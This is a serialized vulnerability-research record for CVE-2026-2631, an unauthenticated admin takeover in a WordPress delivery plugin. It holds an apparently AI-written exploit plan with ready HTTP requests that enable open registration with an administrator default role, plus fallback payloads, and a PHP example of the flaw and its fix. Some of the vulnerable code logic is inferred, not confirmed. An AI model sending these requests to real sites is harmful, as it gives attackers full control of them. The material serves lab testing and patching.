[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$frZmVF2SYmEGMGgG_4-gUx6fucy-B7Z5y9fwKy5KQvGc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"source_links":32},"CVE-2026-2631","datalogics-ecommerce-delivery-datalogics-unauthenticated-privilege-escalation","Datalogics Ecommerce Delivery – Datalogics \u003C 2.6.60 - Unauthenticated Privilege Escalation","The Datalogics Ecommerce Delivery – Datalogics plugin for WordPress is vulnerable to privilege escalation in all versions up to 2.6.60 (exclusive). This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","datalogics",null,"\u003C2.6.60","2.6.60","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-03-12 00:00:00","2026-03-19 13:34:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F523b5dd3-eb73-4156-ad2b-4d532e8d40f3?source=api-prod",8,[22,23,24],"README.txt","api.php","datalogics.php","researched",false,3,"# Research Plan: CVE-2026-2631 Unauthenticated Privilege Escalation in Datalogics\n\n## 1. 
Vulnerability Summary\nThe **Datalogics Ecommerce Delivery** plugin for WordPress is vulnerable to unauthenticated privilege escalation via its REST API. The plugin registers several REST routes under the namespace `datalogics-0\u002Fv1` (derived from the `datalogics_ID` constant). These routes, specifically `\u002Fupdate-settings\u002F` and `\u002Fupdate-token\u002F`, use a permission callback named `datalogics_permission_check`.\n\nThe working hypothesis is that two conditions hold together: `datalogics_permission_check` returns `true` for unauthenticated requests, and the `datalogics_update_settings` callback writes whatever option names the request supplies, without restricting them to the plugin's own options. Both are needed for the attack below. By updating the `users_can_register` and `default_role` options, an attacker can enable public registration and ensure every newly registered user is granted the `administrator` role.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`\n- **Alternative Endpoint:** `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F` (if the primary endpoint rejects arbitrary option names, a successful write here still confirms that the permission callback passes unauthenticated requests).\n- **Namespace:** `datalogics-0\u002Fv1` (based on `define('datalogics_ID','0');` in `datalogics.php`).\n- **Authentication:** Unauthenticated.\n- **Preconditions:** A vulnerable version (\u003C 2.6.60) of the plugin must be installed and active.\n- **Payload:** A JSON object containing WordPress core options:\n    - `users_can_register`: `1`\n    - `default_role`: `administrator`\n\n## 3. Code Flow\n1. **Entry Point:** The WordPress REST API receives a `POST` request to `\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`.\n2. **Hook Registration:** `api.php` registers the route via the `rest_api_init` hook in `datalogics_register_api_routes()`.\n3. **Permission Check:** WordPress calls `datalogics_permission_check`. If this function returns `true` for an anonymous caller (which it must for this CVE to be exploitable unauthenticated), the request proceeds.\n4. 
**Callback Execution:** WordPress executes the callback `datalogics_update_settings` (referenced in `api.php`).\n5. **Sink:** The callback (inferred logic) iterates through the provided parameters and calls `update_option($key, $value)` for each, with the request-supplied key used as the option name.\n6. **Persistence:** The `users_can_register` and `default_role` options are updated in the `wp_options` table.\n\n## 4. Nonce Acquisition Strategy\nBased on the `api.php` file, the REST routes are registered with a `permission_callback`. A REST nonce (`X-WP-Nonce`) only matters for cookie-authenticated callers: without a valid one, core treats the request as anonymous rather than rejecting it. If the `permission_callback` returns `true` for the anonymous user, **no nonce is required** for the request to be processed.\n\nThe source code does not show any `wp_verify_nonce` or `check_ajax_referer` calls inside the REST callbacks. Therefore, this exploit is likely **nonce-less**.\n\n## 5. Exploitation Strategy\n\n### Step 1: Update WordPress Options\nUse the `http_request` tool to send a POST request to the `update-settings` endpoint to enable open registration with `administrator` as the default role.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fjson\n\n{\n  \"users_can_register\": \"1\",\n  \"default_role\": \"administrator\"\n}\n```\n\n### Step 2: Verify Option Change (Internal)\nVerify that the options were changed using WP-CLI (`wp option get users_can_register` and `wp option get default_role`).\n\n### Step 3: Register New Admin User\nSend a POST request to `wp-login.php` to register a new account. The registration form does not accept a password: WordPress emails the new user a link to set one, so in the lab the registration address must be a mailbox the tester can read, or the password can be set afterwards with `wp user update attacker_admin --user_pass=\u003Cpassword\u003E`.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-login.php?action=register HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\nuser_login=attacker_admin&user_email=attacker@example.com&redirect_to=&wp-submit=Register\n```\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure the Datalogics plugin (version \u003C 2.6.60) is installed and activated.\n2. **Initial State:**\n    - `wp option get users_can_register` should be `0`.\n    - `wp option get default_role` should be `subscriber`.\n\n## 7. 
Expected Results\n1. The first request to `\u002Fupdate-settings\u002F` should return a `200 OK` response (or a JSON body with `success: true`).\n2. The options `users_can_register` and `default_role` will be updated in the database.\n3. The registration request will succeed (WordPress redirects to `wp-login.php?checkemail=registered`), and a new user `attacker_admin` will be created.\n4. The user `attacker_admin` will possess the `administrator` role.\n\n## 8. Verification Steps\nAfter performing the HTTP requests, run the following WP-CLI commands to confirm escalation:\n```bash\n# Check if registration was enabled\nwp option get users_can_register\n\n# Check if default role was changed\nwp option get default_role\n\n# Check the role of the newly created user\n# (not `--user=`, which is the global WP-CLI flag for running the command *as* that user)\nwp user get attacker_admin --field=roles\n\n# Cross-check: the new account should appear among the administrators\nwp user list --role=administrator --field=user_login\n```\n\n## 9. Alternative Approaches\nIf the `update-settings` endpoint does not accept arbitrary options in a JSON body, try:\n1. **Form-Encoded Payload:**\n   `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F` with body `users_can_register=1&default_role=administrator`.\n2. **Target `update-token`:**\n   Test if `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F` with `token=pwned` works. If it does, the `permission_callback` is definitely bypassed, regardless of which option names `update-settings` accepts.\n3. 
**Specific Key Injection:** \n   Check if the callback expects a nested array, e.g., `{\"settings\": {\"default_role\": \"administrator\"}}`.","gemini-3-flash-preview","2026-04-18 03:57:08","2026-04-18 03:57:50",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","2.6.59","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdatalogics\u002Ftags\u002F2.6.59","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.59.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdatalogics\u002Ftags\u002F2.6.60","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.60.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdatalogics\u002Ftags"]
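Added example, not part of the page's data payload and not the Datalogics plugin's own code: the route pattern the research plan hypothesises for `update-settings` and `update-token` (a permission callback that passes everyone, feeding request-supplied keys straight into `update_option`), shown next to a hardened registration that would close the flaw. All `demo_*` function names and the `datalogics_*` option names are assumptions; the WordPress APIs used (`register_rest_route`, `current_user_can`, `update_option`, `rest_sanitize_boolean`, `rest_authorization_required_code`) are core.

```php
<?php
// Added illustration for CVE-2026-2631; function and option names are assumed,
// only the WordPress core APIs are real. Do not drop this into a live site as-is.

// --- Hypothesised vulnerable pattern (what the research plan expects) ------
function demo_permission_check_open( WP_REST_Request $request ) {
    return true; // every caller, including anonymous ones, passes
}

function demo_update_settings_open( WP_REST_Request $request ) {
    // Attacker controls both $key and $value: users_can_register=1,
    // default_role=administrator land in wp_options unchanged.
    foreach ( $request->get_json_params() as $key => $value ) {
        update_option( $key, $value );
    }
    return rest_ensure_response( array( 'success' => true ) );
}

// --- Hardened version -------------------------------------------------------
// Only a user holding manage_options reaches the callback. Cookie-authenticated
// callers must also send a valid X-WP-Nonce; without it core treats the request
// as anonymous and current_user_can() returns false.
function demo_permission_check_strict( WP_REST_Request $request ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error(
            'rest_forbidden',
            'You are not allowed to change these settings.',
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return true;
}

// Allowlist of plugin-owned option names (assumed) mapped to core sanitizers.
// Anything outside this list, core options included, never reaches update_option.
const DEMO_ALLOWED_OPTIONS = array(
    'datalogics_api_url' => 'esc_url_raw',
    'datalogics_token'   => 'sanitize_text_field',
    'datalogics_enabled' => 'rest_sanitize_boolean',
);

function demo_update_settings_strict( WP_REST_Request $request ) {
    $updated = array();
    $ignored = array();
    foreach ( (array) $request->get_json_params() as $key => $value ) {
        if ( ! isset( DEMO_ALLOWED_OPTIONS[ $key ] ) ) {
            $ignored[] = $key; // e.g. users_can_register, default_role
            continue;
        }
        update_option( $key, call_user_func( DEMO_ALLOWED_OPTIONS[ $key ], $value ) );
        $updated[] = $key;
    }
    return rest_ensure_response( array( 'updated' => $updated, 'ignored' => $ignored ) );
}

// update-token only ever writes one fixed option; the key is not user-supplied.
function demo_update_token_strict( WP_REST_Request $request ) {
    $token = sanitize_text_field( (string) $request->get_param( 'token' ) );
    if ( '' === $token ) {
        return new WP_Error( 'rest_invalid_param', 'token is required.', array( 'status' => 400 ) );
    }
    update_option( 'datalogics_token', $token );
    return rest_ensure_response( array( 'success' => true ) );
}

add_action( 'rest_api_init', function () {
    $namespace = 'datalogics-0/v1';
    register_rest_route( $namespace, '/update-settings/', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'demo_update_settings_strict',
        'permission_callback' => 'demo_permission_check_strict',
    ) );
    register_rest_route( $namespace, '/update-token/', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'demo_update_token_strict',
        'permission_callback' => 'demo_permission_check_strict',
        'args'                => array(
            'token' => array( 'type' => 'string', 'required' => true ),
        ),
    ) );
} );
```

With the hardened routes installed, the plan's first request from an anonymous client returns a `401`/`403` JSON error from the permission callback before the callback body runs, and even an authenticated administrator posting `default_role` gets it back under `ignored` rather than written to `wp_options`; the option allowlist is what makes a future permission-callback regression non-fatal.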